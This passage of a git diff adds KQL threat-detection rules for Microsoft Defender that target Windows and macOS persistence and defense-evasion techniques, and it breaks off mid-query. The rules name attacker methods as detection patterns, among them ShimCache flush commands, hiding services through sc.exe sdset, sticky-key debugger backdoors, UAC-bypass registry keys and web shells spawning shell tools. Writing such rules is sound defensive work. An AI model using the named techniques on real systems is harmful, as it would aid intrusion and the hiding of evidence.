"\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql new file mode 100644 index 00000000..3d5077f1 --- /dev/null +++ b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql @@ -0,0 +1,15 @@ +// Title: Security Event Logging Disabled via MiniNt Registry Key - Registry Set +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-04-09 +// Level: high +// Description: Detects the addition of the 'MiniNt' key to the registry. Upon a reboot, Windows Event Log service will stop writing events. +Windows Event Log is a service that collects and stores event logs from the operating system and applications. It is an important component of Windows security and auditing. +Adversary may want to disable this service to disable logging of security events which could be used to detect their activities. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001 +// False Positives: +// - Highly Unlikely + +DeviceRegistryEvents +| where RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Control\\MiniNt\\(Default)" \ No newline at end of file diff --git a/KQL/rules/Persistence/service_binary_in_suspicious_folder.kql b/KQL/rules/Persistence/service_binary_in_suspicious_folder.kql new file mode 100644 index 00000000..6274aaec --- /dev/null +++ b/KQL/rules/Persistence/service_binary_in_suspicious_folder.kql @@ -0,0 +1,10 @@ +// Title: Service Binary in Suspicious Folder +// Author: Florian Roth (Nextron Systems), frack113 +// Date: 2022-05-02 +// Level: high +// Description: Detect the creation of a service with a service binary located in a suspicious directory +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where (((RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Perflogs\\" or RegistryValueData contains "\\ADMIN$\\" or RegistryValueData contains "\\Temp\\") and RegistryKey endswith "\\ImagePath" and RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services*") or ((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "DWORD (0x00000002)")) and (InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Perflogs\\" or InitiatingProcessFolderPath contains "\\ADMIN$\\" or InitiatingProcessFolderPath contains "\\Temp\\") and RegistryKey endswith "\\Start" and RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services*")) and (not(((InitiatingProcessFolderPath contains "\\Common Files\\" and InitiatingProcessFolderPath contains "\\Temp\\") or (RegistryValueData endswith "\\AppData\\Local\\Temp\\MBAMInstallerService.exe\"" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\services.exe" and RegistryKey endswith "\\CurrentControlSet\\Services\\MBAMInstallerService\\ImagePath")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql b/KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql new file mode 100644 index 00000000..4d64c17b --- /dev/null +++ b/KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql @@ -0,0 +1,10 @@ +// Title: Service DACL Abuse To Hide Services Via Sc.EXE +// Author: Andreas Hunkeler (@Karneades) +// Date: 2021-12-20 +// Level: high +// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011 + +DeviceProcessEvents +| where (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "DCLCWPDTSD") and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") \ No newline at end of file diff --git a/KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql new file mode 100644 index 00000000..c6a06180 --- /dev/null +++ b/KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql @@ -0,0 +1,10 @@ +// Title: Service Security Descriptor Tampering Via Sc.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-28 +// Level: medium +// Description: Detection of sc.exe utility adding a new service with special permission which hides that service. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011 + +DeviceProcessEvents +| where ProcessCommandLine contains "sdset" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") \ No newline at end of file diff --git a/KQL/rules/Persistence/servicedll_hijack.kql b/KQL/rules/Persistence/servicedll_hijack.kql new file mode 100644 index 00000000..7c54ba65 --- /dev/null +++ b/KQL/rules/Persistence/servicedll_hijack.kql @@ -0,0 +1,15 @@ +// Title: ServiceDll Hijack +// Author: frack113 +// Date: 2022-02-04 +// Level: medium +// Description: Detects changes to the "ServiceDLL" value related to a service in the registry. +This is often used as a method of persistence. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 +// False Positives: +// - Administrative scripts +// - Installation of a service + +DeviceRegistryEvents +| where ((RegistryKey endswith "\\System*" and RegistryKey contains "ControlSet" and RegistryKey endswith "\\Services*") and RegistryKey endswith "\\Parameters\\ServiceDll") and (not(((RegistryValueData =~ "%%systemroot%%\\system32\\ntdsa.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe" and RegistryKey endswith "\\Services\\NTDS\\Parameters\\ServiceDll") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or RegistryValueData =~ "C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll"))) and (not((RegistryValueData =~ "C:\\Windows\\System32\\STAgent.dll" and InitiatingProcessFolderPath endswith "\\regsvr32.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql b/KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql new file mode 100644 index 00000000..b774d693 --- /dev/null +++ b/KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql @@ -0,0 +1,10 @@ +// Title: Shell Open Registry Keys Manipulation +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1546.001 + +DeviceRegistryEvents +| where (RegistryValueData contains "\\Software\\Classes\\{" and ActionType =~ "RegistryValueSet" and RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\SymbolicLinkValue") or RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\DelegateExecute" or ((ActionType =~ "RegistryValueSet" and (RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\(Default)" or RegistryKey endswith "Classes\\exefile\\shell\\open\\command\\(Default)")) and (not(RegistryValueData =~ "(Empty)"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/shimcache_flush.kql b/KQL/rules/Persistence/shimcache_flush.kql new file mode 100644 index 00000000..ad06b4b2 --- /dev/null +++ b/KQL/rules/Persistence/shimcache_flush.kql @@ -0,0 +1,10 @@ +// Title: ShimCache Flush +// Author: Florian Roth (Nextron Systems) +// Date: 2021-02-01 +// Level: high +// Description: Detects actions that clear the local ShimCache and remove forensic evidence +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "apphelp.dll") and (ProcessCommandLine contains "ShimFlushCache" or ProcessCommandLine contains "#250")) or ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "kernel32.dll") and (ProcessCommandLine contains "BaseFlushAppcompatCache" or ProcessCommandLine contains "#46")) \ No newline at end of file diff --git a/KQL/rules/Persistence/startup_item_file_created_macos.kql b/KQL/rules/Persistence/startup_item_file_created_macos.kql new file mode 100644 index 00000000..1df6ef62 --- /dev/null +++ b/KQL/rules/Persistence/startup_item_file_created_macos.kql @@ -0,0 +1,15 @@ +// Title: Startup Item File Created - MacOS +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-14 +// Level: low +// Description: Detects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence. +Adversaries may use startup items automatically executed at boot initialization to establish persistence. +Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1037.005 +// False Positives: +// - Legitimate administration activities + +DeviceFileEvents +| where FolderPath endswith ".plist" and (FolderPath startswith "/Library/StartupItems/" or FolderPath startswith "/System/Library/StartupItems") \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql b/KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql new file mode 100644 index 00000000..dafc5327 --- /dev/null +++ b/KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql @@ -0,0 +1,10 @@ +// Title: Suspicious ASPX File Drop by Exchange +// Author: Florian Roth (Nextron Systems), MSTI (query, idea) +// Date: 2022-10-01 +// Level: high +// Description: Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.003 + +DeviceFileEvents +| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe" and (FolderPath contains "FrontEnd\\HttpProxy\\" or FolderPath contains "\\inetpub\\wwwroot\\aspnet_client\\")) and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx") \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql b/KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql new file mode 100644 index 00000000..a3e73e24 --- /dev/null +++ b/KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Chromium Browser Instance Executed With Custom Extension +// Author: Aedan Russell, frack113, X__Junior (Nextron Systems) +// Date: 2022-06-19 +// Level: high +// Description: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1176.001 + +DeviceProcessEvents +| where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql b/KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql new file mode 100644 index 00000000..0587ee17 --- /dev/null +++ b/KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Debugger Registration Cmdline +// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro +// Date: 2019-09-06 +// Level: high +// Description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor). +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.008 + +DeviceProcessEvents +| where ProcessCommandLine contains "\\CurrentVersion\\Image File Execution Options\\" and (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "magnify.exe" or ProcessCommandLine contains "narrator.exe" or ProcessCommandLine contains "displayswitch.exe" or ProcessCommandLine contains "atbroker.exe" or ProcessCommandLine contains "HelpPane.exe") \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql b/KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql new file mode 100644 index 00000000..bc22f733 --- /dev/null +++ b/KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql @@ -0,0 +1,10 @@ +// Title: Suspicious File Creation Activity From Fake Recycle.Bin Folder +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-12 +// Level: high +// Description: Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion + +DeviceFileEvents +| where (InitiatingProcessFolderPath contains "RECYCLERS.BIN\\" or InitiatingProcessFolderPath contains "RECYCLER.BIN\\") or (FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\") \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql b/KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql new file mode 100644 index 00000000..14be4920 --- /dev/null +++ b/KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql @@ -0,0 +1,10 @@ +// Title: Suspicious File Drop by Exchange +// Author: Florian Roth (Nextron Systems) +// Date: 2022-10-04 +// Level: medium +// Description: Detects suspicious file type dropped by an Exchange component in IIS +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1190, attack.initial-access, attack.t1505.003 + +DeviceFileEvents +| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx" or FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".vbs") \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql b/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql new file mode 100644 index 00000000..894d04d5 --- /dev/null +++ b/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql @@ -0,0 +1,12 @@ +// Title: Suspicious File Write to Webapps Root Directory +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-20 +// Level: medium +// Description: Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers. +This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.003, attack.initial-access, attack.t1190 + +DeviceFileEvents +| where FolderPath contains "\\webapps\\ROOT\\" and (FolderPath contains "\\apache" or FolderPath contains "\\tomcat") and FolderPath endswith ".jsp" and (InitiatingProcessFolderPath endswith "\\dotnet.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\java.exe") \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_iis_module_registration.kql b/KQL/rules/Persistence/suspicious_iis_module_registration.kql new file mode 100644 index 00000000..7b2e08b7 --- /dev/null +++ b/KQL/rules/Persistence/suspicious_iis_module_registration.kql @@ -0,0 +1,12 @@ +// Title: Suspicious IIS Module Registration +// Author: Florian Roth (Nextron Systems), Microsoft (idea) +// Date: 2022-08-04 +// Level: high +// Description: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.004 +// False Positives: +// - Administrative activity + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\w3wp.exe" and (ProcessCommandLine contains "appcmd.exe add module" or (ProcessCommandLine contains " system.enterpriseservices.internal.publish" and FolderPath endswith "\\powershell.exe") or (ProcessCommandLine contains "gacutil" and ProcessCommandLine contains " /I")) \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_new_service_creation.kql b/KQL/rules/Persistence/suspicious_new_service_creation.kql new file mode 100644 index 00000000..5202d2e0 --- /dev/null +++ b/KQL/rules/Persistence/suspicious_new_service_creation.kql @@ -0,0 +1,12 @@ +// Title: Suspicious New Service Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-14 +// Level: high +// Description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName") or ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath=") and FolderPath endswith "\\sc.exe")) and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql b/KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql new file mode 100644 index 00000000..9b458273 --- /dev/null +++ b/KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Printer Driver Empty Manufacturer +// Author: Florian Roth (Nextron Systems) +// Date: 2020-07-01 +// Level: high +// Description: Detects a suspicious printer driver installation with an empty Manufacturer value +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675 +// False Positives: +// - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value + +DeviceRegistryEvents +| where (RegistryValueData =~ "(Empty)" and (RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers" and RegistryKey contains "\\Manufacturer")) and (not((RegistryKey endswith "\\CutePDF Writer v4.0*" or RegistryKey endswith "\\Version-3\\PDF24*" or (RegistryKey endswith "\\VNC Printer (PS)*" or RegistryKey endswith "\\VNC Printer (UD)*")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql b/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql new file mode 100644 index 00000000..5ac1d12c --- /dev/null +++ b/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Process By Web Server Process +// Author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-01-16 +// Level: high +// Description: Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.initial-access, attack.t1505.003, attack.t1190 +// False Positives: +// - Particular web applications may spawn a shell process legitimately + +DeviceProcessEvents +| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((InitiatingProcessCommandLine contains "CATALINA_HOME" or InitiatingProcessCommandLine contains "catalina.home" or InitiatingProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\php.exe" or InitiatingProcessFolderPath endswith "\\tomcat.exe" or InitiatingProcessFolderPath endswith "\\UMWorkerProcess.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_TomcatService.exe")) and (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\at.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dsget.exe" or FolderPath endswith "\\hostname.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netdom.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ntdsutil.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\qprocess.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\qwinsta.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wusa.exe") and (not(((ProcessCommandLine endswith "Windows\\system32\\cmd.exe /c C:\\ManageEngine\\ADManager \"Plus\\ES\\bin\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt" and InitiatingProcessFolderPath endswith "\\java.exe") or ((ProcessCommandLine contains "sc query" and ProcessCommandLine contains "ADManager Plus") and InitiatingProcessFolderPath endswith "\\java.exe")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql b/KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql new file mode 100644 index 00000000..4f062d73 --- /dev/null +++ b/KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Process Execution From Fake Recycle.Bin Folder +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-12 +// Level: high +// Description: Detects process execution from a fake recycle bin folder, often used to avoid security solution. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\" \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql b/KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql new file mode 100644 index 00000000..1b81012b --- /dev/null +++ b/KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Registry Modification From ADS Via Regini.EXE +// Author: Eli Salem, Sander Wiebing, oscd.community +// Date: 2020-10-12 +// Level: high +// Description: Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1112, attack.defense-evasion + +DeviceProcessEvents +| where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and ProcessCommandLine matches regex ":[^ \\\\]" \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql b/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql new file mode 100644 index 00000000..ad351cb9 --- /dev/null +++ b/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql @@ -0,0 +1,14 @@ +// Title: Suspicious ScreenSave Change by Reg.exe +// Author: frack113 +// Date: 2021-08-19 +// Level: medium +// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity. +Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.002 +// False Positives: +// - GPO + +DeviceProcessEvents +| where ((ProcessCommandLine contains "HKEY_CURRENT_USER\\Control Panel\\Desktop" or ProcessCommandLine contains "HKCU\\Control Panel\\Desktop") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/v ScreenSaveActive" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 1" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaveTimeout" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaverIsSecure" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 0" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v SCRNSAVE.EXE" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains ".scr" and ProcessCommandLine contains "/f")) \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_service_path_modification.kql b/KQL/rules/Persistence/suspicious_service_path_modification.kql new file mode 100644 index 00000000..ae3e9bc4 --- /dev/null +++ b/KQL/rules/Persistence/suspicious_service_path_modification.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Service Path Modification +// Author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-21 +// Level: high +// Description: Detects service path modification via the "sc" binary to a suspicious command or path +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") and (ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql b/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql new file mode 100644 index 00000000..9d6e36d2 --- /dev/null +++ b/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql @@ -0,0 +1,15 @@ +// Title: Suspicious VBoxDrvInst.exe Parameters +// Author: Konstantin Grishchenko, oscd.community +// Date: 2020-10-06 +// Level: medium +// Description: Detect VBoxDrvInst.exe run with parameters allowing processing INF file. +This allows to create values in the registry and install drivers. +For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process + +DeviceProcessEvents +| where (ProcessCommandLine contains "driver" and ProcessCommandLine contains "executeinf") and FolderPath endswith "\\VBoxDrvInst.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql b/KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql new file mode 100644 index 00000000..5f67a5a7 --- /dev/null +++ b/KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql @@ -0,0 +1,10 @@ +// Title: Terminal Server Client Connection History Cleared - Registry +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-10-19 +// Level: high +// Description: Detects the deletion of registry keys containing the MSTSC connection history +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1070, attack.t1112 + +DeviceRegistryEvents +| where (ActionType =~ "DeleteValue" and RegistryKey contains "\\Microsoft\\Terminal Server Client\\Default\\MRU") or ((ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and RegistryKey endswith "\\Microsoft\\Terminal Server Client\\Servers*") \ No newline at end of file diff --git a/KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql b/KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql new file mode 100644 index 00000000..b5c08c75 --- /dev/null +++ b/KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql @@ -0,0 +1,12 @@ +// Title: Trust Access Disable For VBApplications +// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-05-22 +// Level: high +// Description: Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where 